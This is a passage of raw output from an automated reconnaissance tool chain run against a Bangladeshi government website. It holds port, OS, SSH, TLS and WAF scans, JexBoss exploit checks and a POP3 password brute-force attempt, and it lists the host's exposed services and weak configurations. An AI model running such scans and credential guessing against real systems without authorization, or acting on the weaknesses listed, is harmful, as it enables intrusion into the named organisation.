804. Loaded 5 hosts from /root/aquatone/www.bpc.gov.bd/hosts.json
805. Loaded 25 domain takeover detectors
806.  
807. Identifying nameservers for www.bpc.gov.bd... Done
808. Using nameservers:
809.  
810. - 50.22.35.226
811. - 174.37.183.108
812.  
813. Checking hosts for domain takeover vulnerabilities...
814.  
815. Finished checking hosts:
816.  
817. - Vulnerable : 0
818. - Not Vulnerable : 5
819.  
820. Wrote 0 potential subdomain takeovers to:
821.  
822. - file:///root/aquatone/www.bpc.gov.bd/takeovers.json
823.  
824. __
825. ____ _____ ___ ______ _/ /_____ ____ ___
826. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
827. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
828. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
829. /_/ scan v0.5.0 - by @michenriksen
830.  
831. Loaded 5 hosts from /root/aquatone/www.bpc.gov.bd/hosts.json
832.  
833. Probing 2 ports...
834. 80/tcp 173.237.136.21 www.bpc.gov.bd, webmail.bpc.gov.bd, cpanel.bpc.gov.bd and 2 more
835. 443/tcp 173.237.136.21 www.bpc.gov.bd, cpanel.bpc.gov.bd, mail.bpc.gov.bd and 2 more
836.  
837. Wrote open ports to file:///root/aquatone/www.bpc.gov.bd/open_ports.txt
838. Wrote URLs to file:///root/aquatone/www.bpc.gov.bd/urls.txt
839. __
840. ____ _____ ___ ______ _/ /_____ ____ ___
841. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
842. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
843. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
844. /_/ gather v0.5.0 - by @michenriksen
845.  
846. Processing 10 pages...
847.  
848. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
849.  
850. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
851.  
852. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
853.  
854. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
855.  
856. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
857.  
858. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
859.  
860. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
861.  
862. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
863.  
864. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
865.  
866. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
867. #######################################################################################################################################
868. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:07 EST
869. Nmap scan report for www.bpc.gov.bd (173.237.136.21)
870. Host is up (0.22s latency).
871. Not shown: 459 closed ports, 3 filtered ports
872. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
873. PORT STATE SERVICE
874. 21/tcp open ftp
875. 22/tcp open ssh
876. 53/tcp open domain
877. 80/tcp open http
878. 110/tcp open pop3
879. 143/tcp open imap
880. 443/tcp open https
881. 465/tcp open smtps
882. 587/tcp open submission
883. 993/tcp open imaps
884. 995/tcp open pop3s
885. 3306/tcp open mysql
886. 8080/tcp open http-proxy
887. 8443/tcp open https-alt
888. #######################################################################################################################################
889. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:07 EST
890. Nmap scan report for www.bpc.gov.bd (173.237.136.21)
891. Host is up (0.20s latency).
892. Not shown: 11 closed ports, 2 filtered ports
893. PORT STATE SERVICE
894. 53/udp open domain
895. #######################################################################################################################################
896. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:08 EST
897. Nmap scan report for www.bpc.gov.bd (173.237.136.21)
898. Host is up (0.22s latency).
899.  
900. PORT STATE SERVICE VERSION
901. 21/tcp open ftp Pure-FTPd
902. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
903. Device type: WAP
904. Running: Linux 2.4.X|2.6.X
905. OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22
906. OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22)
907. Network Distance: 12 hops
908.  
909. TRACEROUTE (using port 21/tcp)
910. HOP RTT ADDRESS
911. 1 105.68 ms 10.251.200.1
912. 2 105.73 ms 185.94.189.129
913. 3 104.10 ms 185.206.226.109
914. 4 104.97 ms 213.248.70.225
915. 5 220.50 ms prs-bb3-link.telia.net (62.115.138.132)
916. 6 221.80 ms 80.91.251.243
917. 7 204.54 ms atl-b22-link.telia.net (62.115.125.191)
918. 8 220.52 ms 80.91.246.75
919. 9 221.15 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
920. 10 217.15 ms 207.210.229.6
921. 11 221.88 ms 174.136.31.214
922. 12 ... 30
923. #######################################################################################################################################
924. # general
925. (gen) banner: SSH-2.0-OpenSSH_5.3
926. (gen) software: OpenSSH 5.3
927. (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+
928. (gen) compression: enabled (zlib@openssh.com)
929.  
930. # key exchange algorithms
931. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
932. `- [info] available since OpenSSH 4.4
933.  
934. # host-key algorithms
935. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
936. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
937. `- [warn] using small 1024-bit modulus
938. `- [warn] using weak random number generator could reveal the key
939. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
940.  
941. # encryption algorithms (ciphers)
942. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
943. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
944. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
945.  
946. # message authentication code algorithms
947. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
948. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
949. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
950. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
951. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
952. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
953. `- [warn] using encrypt-and-MAC mode
954. `- [info] available since OpenSSH 2.5.0
955. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
956. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
957. `- [warn] using encrypt-and-MAC mode
958. `- [info] available since OpenSSH 2.1.0
959.  
960. # algorithm recommendations (for OpenSSH 5.3)
961. (rec) -ssh-dss -- key algorithm to remove
962. (rec) -hmac-ripemd160 -- mac algorithm to remove
963. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
964. #######################################################################################################################################
965. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:19 EST
966. Nmap scan report for www.bpc.gov.bd (173.237.136.21)
967. Host is up (0.22s latency).
968.  
969. PORT STATE SERVICE VERSION
970. 22/tcp closed ssh
971. Too many fingerprints match this host to give specific OS details
972. Network Distance: 12 hops
973.  
974. TRACEROUTE (using port 22/tcp)
975. HOP RTT ADDRESS
976. 1 102.43 ms 10.251.200.1
977. 2 102.68 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
978. 3 104.63 ms 185.206.226.109
979. 4 104.66 ms 213.248.70.225
980. 5 229.15 ms prs-bb4-link.telia.net (62.115.138.138)
981. 6 218.30 ms 62.115.122.159
982. 7 200.12 ms atl-b22-link.telia.net (62.115.125.128)
983. 8 221.11 ms 80.91.246.75
984. 9 217.75 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
985. 10 217.74 ms 207.210.229.6
986. 11 222.77 ms 174.136.31.214
987. 12 221.44 ms 173.237.136.21
988. ######################################################################################################################################
989. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:19 EST
990. Nmap scan report for www.bpc.gov.bd (173.237.136.21)
991. Host is up (0.22s latency).
992.  
993. PORT STATE SERVICE VERSION
994. 53/tcp open domain?
995. |_dns-fuzz: Server didn't response to our probe, can't fuzz
996. | dns-nsec-enum:
997. |_ No NSEC records found
998. | dns-nsec3-enum:
999. |_ DNSSEC NSEC3 not supported
1000. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1001. Aggressive OS guesses: Tomato 1.27 - 1.28 (Linux 2.4.20) (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 2.6.18 - 2.6.22 (94%), MikroTik RouterOS 6.15 (Linux 3.3.5) (93%), HP P2000 G3 NAS device (92%), Linux 3.10 - 3.12 (90%), Linux 3.10 - 4.11 (90%), Linux 3.16 - 4.6 (90%), Linux 3.18 (90%)
1002. No exact OS matches for host (test conditions non-ideal).
1003. Network Distance: 12 hops
1004.  
1005. TRACEROUTE (using port 53/tcp)
1006. HOP RTT ADDRESS
1007. 1 109.51 ms 10.251.200.1
1008. 2 109.59 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
1009. 3 104.85 ms 185.206.226.109
1010. 4 104.87 ms 213.248.70.225
1011. 5 221.30 ms prs-bb3-link.telia.net (62.115.138.132)
1012. 6 219.96 ms 80.91.251.243
1013. 7 200.12 ms atl-b22-link.telia.net (62.115.125.128)
1014. 8 223.67 ms 80.91.246.75
1015. 9 221.92 ms 213.248.71.138
1016. 10 220.79 ms 207.210.229.6
1017. 11 220.76 ms infweb6.smtpserve.com (72.29.120.126)
1018. 12 220.80 ms 173.237.136.21
1019. #######################################################################################################################################
1020. ^ ^
1021. _ __ _ ____ _ __ _ _ ____
1022. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1023. | V V // o // _/ | V V // 0 // 0 // _/
1024. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1025. <
1026. ...'
1027.  
1028. WAFW00F - Web Application Firewall Detection Tool
1029.  
1030. By Sandro Gauci && Wendel G. Henrique
1031.  
1032. Checking http://www.bpc.gov.bd
1033. The site http://www.bpc.gov.bd is behind a Trustwave ModSecurity
1034. Number of requests: 6
1035. ######################################################################################################################################
1036.  
1037. wig - WebApp Information Gatherer
1038.  
1039.  
1040. Scanning http://www.bpc.gov.bd...
1041. _________________ SITE INFO __________________
1042. IP Title
1043. 173.237.136.21 Bangladesh Petroleum Corporat
1044.  
1045. __________________ VERSION ___________________
1046. Name Versions Type
1047. PHP Platform
1048. jQuery 1.6.3 JavaScript
1049.  
1050. ________________ INTERESTING _________________
1051. URL Note Type
1052. /login.php Login Page Interesting
1053.  
1054. ______________________________________________
1055. Time: 1.6 sec Urls: 620 Fingerprints: 40401
1056. ######################################################################################################################################
1057. HTTP/1.1 200 OK
1058. Date: Fri, 23 Nov 2018 05:31:07 GMT
1059. Content-Type: text/html; charset=UTF-8
1060. Content-Encoding: gzip
1061. Connection: keep-alive
1062. #######################################################################################################################################
1063. --------------------------------------------------------------------------------------------------------------------------------------
1064.  
1065. [ ! ] Starting SCANNER INURLBR 2.1 at [23-11-2018 00:31:49]
1066. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
1067. It is the end user's responsibility to obey all applicable local, state and federal laws.
1068. Developers assume no liability and are not responsible for any misuse or damage caused by this program
1069.  
1070. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-www.bpc.gov.bd.txt ]
1071. [ INFO ][ DORK ]::[ site:www.bpc.gov.bd ]
1072. [ INFO ][ SEARCHING ]:: {
1073. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.tn ]
1074.  
1075. [ INFO ][ SEARCHING ]::
1076. -[:::]
1077. [ INFO ][ ENGINE ]::[ GOOGLE API ]
1078.  
1079. [ INFO ][ SEARCHING ]::
1080. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
1081. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.co.tz ID: 012984904789461885316:oy3-mu17hxk ]
1082.  
1083. [ INFO ][ SEARCHING ]::
1084. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
1085.  
1086. [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
1087. [ INFO ] Not a satisfactory result was found!
1088.  
1089.  
1090. [ INFO ] [ Shutting down ]
1091. [ INFO ] [ End of process INURLBR at [23-11-2018 00:31:58]
1092. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
1093. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-www.bpc.gov.bd.txt ]
1094. |_________________________________________________________________________________________
1095.  
1096. \_________________________________________________________________________________________/
1097. #######################################################################################################################################
1098. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:32 EST
1099. Nmap scan report for www.bpc.gov.bd (173.237.136.21)
1100. Host is up (0.13s latency).
1101.  
1102. PORT STATE SERVICE VERSION
1103. 110/tcp open pop3 Dovecot pop3d
1104. | pop3-brute:
1105. | Accounts: No valid accounts found
1106. |_ Statistics: Performed 205 guesses in 184 seconds, average tps: 1.0
1107. |_pop3-capabilities: USER CAPA RESP-CODES STLS TOP AUTH-RESP-CODE PIPELINING UIDL SASL(PLAIN LOGIN)
1108. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1109. Aggressive OS guesses: Tomato 1.27 - 1.28 (Linux 2.4.20) (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 2.6.18 - 2.6.22 (94%), MikroTik RouterOS 6.15 (Linux 3.3.5) (93%), HP P2000 G3 NAS device (92%), Android 4.1.1 (90%), Linux 3.10 - 3.12 (90%), Linux 3.10 - 4.11 (90%), Linux 3.16 - 4.6 (90%)
1110. No exact OS matches for host (test conditions non-ideal).
1111. Network Distance: 1 hop
1112.  
1113. TRACEROUTE (using port 80/tcp)
1114. HOP RTT ADDRESS
1115. 1 103.05 ms 173.237.136.21
1116. #######################################################################################################################################
1117.  
1118. ^ ^
1119. _ __ _ ____ _ __ _ _ ____
1120. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1121. | V V // o // _/ | V V // 0 // 0 // _/
1122. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1123. <
1124. ...'
1125.  
1126. WAFW00F - Web Application Firewall Detection Tool
1127.  
1128. By Sandro Gauci && Wendel G. Henrique
1129.  
1130. Checking https://www.bpc.gov.bd
1131. The site https://www.bpc.gov.bd is behind a Trustwave ModSecurity
1132. Number of requests: 6
1133. #######################################################################################################################################
1134.  
1135.  
1136. AVAILABLE PLUGINS
1137. -----------------
1138.  
1139. PluginHSTS
1140. PluginChromeSha1Deprecation
1141. PluginSessionResumption
1142. PluginSessionRenegotiation
1143. PluginCertInfo
1144. PluginOpenSSLCipherSuites
1145. PluginHeartbleed
1146. PluginCompression
1147.  
1148.  
1149.  
1150. CHECKING HOST(S) AVAILABILITY
1151. -----------------------------
1152.  
1153. www.bpc.gov.bd:443 => 173.237.136.21:443
1154.  
1155.  
1156.  
1157. SCAN RESULTS FOR WWW.BPC.GOV.BD:443 - 173.237.136.21:443
1158. --------------------------------------------------------
1159.  
1160. * Deflate Compression:
1161. OK - Compression disabled
1162.  
1163. * Session Renegotiation:
1164. Client-initiated Renegotiations: OK - Rejected
1165. Secure Renegotiation: OK - Supported
1166.  
1167. * Certificate - Content:
1168. SHA1 Fingerprint: 3d184337b914105414d261eec073e98185b0cdc9
1169. Common Name: bpc.gov.bd
1170. Issuer: bpc.gov.bd
1171. Serial Number: 0136C4F852
1172. Not Before: Jul 5 15:19:17 2018 GMT
1173. Not After: Jul 5 15:19:17 2019 GMT
1174. Signature Algorithm: sha256WithRSAEncryption
1175. Public Key Algorithm: rsaEncryption
1176. Key Size: 2048 bit
1177. Exponent: 65537 (0x10001)
1178. X509v3 Subject Alternative Name: {'DNS': ['bpc.gov.bd', 'mail.bpc.gov.bd', 'www.bpc.gov.bd']}
1179.  
1180. * Certificate - Trust:
1181. Hostname Validation: OK - Subject Alternative Name matches
1182. Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
1183. Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: self signed certificate
1184. Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
1185. Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
1186. Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: self signed certificate
1187. Certificate Chain Received: ['bpc.gov.bd']
1188.  
1189. * Certificate - OCSP Stapling:
1190. NOT SUPPORTED - Server did not send back an OCSP response.
1191.  
1192. * Session Resumption:
1193. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
1194. With TLS Session Tickets: OK - Supported
1195.  
1196. * SSLV2 Cipher Suites:
1197. Server rejected all cipher suites.
1198.  
1199. * SSLV3 Cipher Suites:
1200. Undefined - An unexpected error happened:
1201. PSK-3DES-EDE-CBC-SHA timeout - timed out
1202. EXP-RC2-CBC-MD5 timeout - timed out
1203. EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
1204. EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
1205. EXP-DES-CBC-SHA timeout - timed out
1206. EXP-ADH-RC4-MD5 timeout - timed out
1207. EXP-ADH-DES-CBC-SHA timeout - timed out
1208. EDH-RSA-DES-CBC-SHA timeout - timed out
1209. EDH-DSS-DES-CBC-SHA timeout - timed out
1210. ECDHE-RSA-NULL-SHA timeout - timed out
1211. ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
1212. DH-RSA-DES-CBC-SHA timeout - timed out
1213. DH-DSS-DES-CBC-SHA timeout - timed out
1214. DES-CBC3-SHA timeout - timed out
1215. DES-CBC-SHA timeout - timed out
1216. ADH-DES-CBC-SHA timeout - timed out
1217.  
1218.  
1219.  
1220. SCAN COMPLETED IN 49.26 S
1221. -------------------------
1222. Version: 1.11.12-static
1223. OpenSSL 1.0.2-chacha (1.0.2g-dev)
1224.  
1225. Connected to 173.237.136.21
1226.  
1227. Testing SSL server www.bpc.gov.bd on port 443 using SNI name www.bpc.gov.bd
1228.  
1229. TLS Fallback SCSV:
1230. Server supports TLS Fallback SCSV
1231.  
1232. TLS renegotiation:
1233. Secure session renegotiation supported
1234.  
1235. TLS Compression:
1236. Compression disabled
1237.  
1238. Heartbleed:
1239. TLS 1.2 not vulnerable to heartbleed
1240. TLS 1.1 not vulnerable to heartbleed
1241. TLS 1.0 not vulnerable to heartbleed
1242.  
1243. Supported Server Cipher(s):
1244. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
1245. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
1246. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
1247. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
1248. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1249. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1250. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1251. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1252. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1253. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1254.  
1255. SSL Certificate:
1256. Signature Algorithm: sha256WithRSAEncryption
1257. RSA Key Strength: 2048
1258.  
1259. Subject: bpc.gov.bd
1260. Altnames: DNS:bpc.gov.bd, DNS:mail.bpc.gov.bd, DNS:www.bpc.gov.bd
1261. Issuer: bpc.gov.bd
1262.  
1263. Not valid before: Jul 5 15:19:17 2018 GMT
1264. Not valid after: Jul 5 15:19:17 2019 GMT
1265.  
1266.  
1267. ^ ^
1268. _ __ _ ____ _ __ _ _ ____
1269. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1270. | V V // o // _/ | V V // 0 // 0 // _/
1271. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1272. <
1273. ...'
1274.  
1275. WAFW00F - Web Application Firewall Detection Tool
1276.  
1277. By Sandro Gauci && Wendel G. Henrique
1278.  
1279. Checking http://www.bpc.gov.bd:8080
1280. The site http://www.bpc.gov.bd:8080 is behind a Trustwave ModSecurity
1281. Number of requests: 6
1282.  
1283. http://www.bpc.gov.bd:8080 [403 Forbidden] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[403 Forbidden], nginx[1.14.0]
1284.  
1285. Version: 1.11.12-static
1286. OpenSSL 1.0.2-chacha (1.0.2g-dev)
1287.  
1288. Connected to 173.237.136.21
1289.  
1290. Testing SSL server www.bpc.gov.bd on port 8080 using SNI name www.bpc.gov.bd
1291.  
1292. TLS Fallback SCSV:
1293. Server does not support TLS Fallback SCSV
1294.  
1295. TLS renegotiation:
1296. Session renegotiation not supported
1297.  
1298. TLS Compression:
1299. Compression disabled
1300.  
1301. Heartbleed:
1302. TLS 1.2 not vulnerable to heartbleed
1303. TLS 1.1 not vulnerable to heartbleed
1304. TLS 1.0 not vulnerable to heartbleed
1305.  
1306. Supported Server Cipher(s):
1307. #######################################################################################################################################
1308.  
1309.  
1310.  
1311. * --- JexBoss: Jboss verify and EXploitation Tool --- *
1312. | * And others Java Deserialization Vulnerabilities * |
1313. | |
1314. | @author: João Filho Matos Figueiredo |
1315. | @contact: joaomatosf@gmail.com |
1316. | |
1317. | @update: https://github.com/joaomatosf/jexboss |
1318. #______________________________________________________#
1319.  
1320. @version: 1.2.4
1321.  
1322. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
1323.  
1324.  
1325. ** Checking Host: http://www.bpc.gov.bd:8080 **
1326.  
1327. [*] Checking admin-console: [ OK ]
1328. [*] Checking Struts2: [ OK ]
1329. [*] Checking Servlet Deserialization: [ OK ]
1330. [*] Checking Application Deserialization: [ OK ]
1331. [*] Checking Jenkins: [ OK ]
1332. [*] Checking web-console: [ OK ]
1333. [*] Checking jmx-console: [ OK ]
1334. [*] Checking JMXInvokerServlet: [ OK ]
1335.  
1336.  
1337. * Results:
1338. The server is not vulnerable to bugs tested ... :D
1339.  
1340. * Info: review, suggestions, updates, etc:
1341. https://github.com/joaomatosf/jexboss
1342.  
1343. * DONATE: Please consider making a donation to help improve this tool,
1344. * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
1345.  
1346. + -- --=[Port 8180 closed... skipping.
1347. + -- --=[Port 8443 opened... running tests...
1348.  
1349. ^ ^
1350. _ __ _ ____ _ __ _ _ ____
1351. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1352. | V V // o // _/ | V V // 0 // 0 // _/
1353. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1354. <
1355. ...'
1356.  
1357. WAFW00F - Web Application Firewall Detection Tool
1358.  
1359. By Sandro Gauci && Wendel G. Henrique
1360.  
1361. Checking http://www.bpc.gov.bd:8443
1362. Generic Detection results:
1363. No WAF detected by the generic detection
1364. Number of requests: 14
1365.  
1366. http://www.bpc.gov.bd:8443 [400 Bad Request] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[400 The plain HTTP request was sent to HTTPS port], nginx[1.14.0]
1367.  
1368. Version: 1.11.12-static
1369. OpenSSL 1.0.2-chacha (1.0.2g-dev)
1370.  
1371. Connected to 173.237.136.21
1372.  
1373. Testing SSL server www.bpc.gov.bd on port 8443 using SNI name www.bpc.gov.bd
1374.  
1375. TLS Fallback SCSV:
1376. Server supports TLS Fallback SCSV
1377.  
1378. TLS renegotiation:
1379. Secure session renegotiation supported
1380.  
1381. TLS Compression:
1382. Compression disabled
1383.  
1384. Heartbleed:
1385. TLS 1.2 not vulnerable to heartbleed
1386. TLS 1.1 not vulnerable to heartbleed
1387. TLS 1.0 not vulnerable to heartbleed
1388.  
1389. Supported Server Cipher(s):
1390. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
1391. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
1392. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
1393. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
1394. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1395. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1396. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1397. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1398. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1399. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1400.  
1401. SSL Certificate:
1402. Signature Algorithm: sha256WithRSAEncryption
1403. RSA Key Strength: 2048
1404.  
1405. Subject: bpc.gov.bd
1406. Altnames: DNS:bpc.gov.bd, DNS:mail.bpc.gov.bd, DNS:www.bpc.gov.bd
1407. Issuer: bpc.gov.bd
1408.  
1409. Not valid before: Jul 5 15:19:17 2018 GMT
1410. Not valid after: Jul 5 15:19:17 2019 GMT
1411.  
1412.  
1413.  
1414. AVAILABLE PLUGINS
1415. -----------------
1416.  
1417. PluginCertInfo
1418. PluginSessionRenegotiation
1419. PluginOpenSSLCipherSuites
1420. PluginHSTS
1421. PluginSessionResumption
1422. PluginChromeSha1Deprecation
1423. PluginHeartbleed
1424. PluginCompression
1425.  
1426.  
1427.  
1428. CHECKING HOST(S) AVAILABILITY
1429. -----------------------------
1430.  
1431. www.bpc.gov.bd:8443 => 173.237.136.21:8443
1432.  
1433.  
1434.  
1435. SCAN RESULTS FOR WWW.BPC.GOV.BD:8443 - 173.237.136.21:8443
1436. ----------------------------------------------------------
1437.  
1438. * Deflate Compression:
1439. OK - Compression disabled
1440.  
1441. * Session Renegotiation:
1442. Client-initiated Renegotiations: OK - Rejected
1443. Secure Renegotiation: OK - Supported
1444.  
1445. * Certificate - Content:
1446. SHA1 Fingerprint: 3d184337b914105414d261eec073e98185b0cdc9
1447. Common Name: bpc.gov.bd
1448. Issuer: bpc.gov.bd
1449. Serial Number: 0136C4F852
1450. Not Before: Jul 5 15:19:17 2018 GMT
1451. Not After: Jul 5 15:19:17 2019 GMT
1452. Signature Algorithm: sha256WithRSAEncryption
1453. Public Key Algorithm: rsaEncryption
1454. Key Size: 2048 bit
1455. Exponent: 65537 (0x10001)
1456. X509v3 Subject Alternative Name: {'DNS': ['bpc.gov.bd', 'mail.bpc.gov.bd', 'www.bpc.gov.bd']}
1457.  
1458. * Certificate - Trust:
1459. Hostname Validation: OK - Subject Alternative Name matches
1460. Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
1461. Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: self signed certificate
1462. Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
1463. Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
1464. Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: self signed certificate
1465. Certificate Chain Received: ['bpc.gov.bd']
1466.  
1467. * Certificate - OCSP Stapling:
1468. NOT SUPPORTED - Server did not send back an OCSP response.
1469.  
1470. * Session Resumption:
1471. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
1472. With TLS Session Tickets: OK - Supported
1473.  
1474. * SSLV2 Cipher Suites:
1475. Server rejected all cipher suites.
1476.  
1477. * SSLV3 Cipher Suites:
1478. Undefined - An unexpected error happened:
1479. PSK-3DES-EDE-CBC-SHA timeout - timed out
1480. NULL-SHA256 timeout - timed out
1481. NULL-SHA timeout - timed out
1482. NULL-MD5 timeout - timed out
1483. EXP-RC4-MD5 timeout - timed out
1484. EXP-RC2-CBC-MD5 timeout - timed out
1485. EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
1486. EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
1487. EXP-DES-CBC-SHA timeout - timed out
1488. EXP-ADH-RC4-MD5 timeout - timed out
1489. EXP-ADH-DES-CBC-SHA timeout - timed out
1490. EDH-RSA-DES-CBC-SHA timeout - timed out
1491. EDH-DSS-DES-CBC3-SHA timeout - timed out
1492. EDH-DSS-DES-CBC-SHA timeout - timed out
1493. ECDHE-RSA-NULL-SHA timeout - timed out
1494. ECDHE-ECDSA-NULL-SHA timeout - timed out
1495. ECDH-RSA-NULL-SHA timeout - timed out
1496. ECDH-RSA-DES-CBC3-SHA timeout - timed out
1497. ECDH-ECDSA-NULL-SHA timeout - timed out
1498. ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
1499. DH-RSA-DES-CBC3-SHA timeout - timed out
1500. DH-RSA-DES-CBC-SHA timeout - timed out
1501. DH-DSS-DES-CBC3-SHA timeout - timed out
1502. DH-DSS-DES-CBC-SHA timeout - timed out
1503. DES-CBC3-SHA timeout - timed out
1504. DES-CBC-SHA timeout - timed out
1505. AECDH-NULL-SHA timeout - timed out
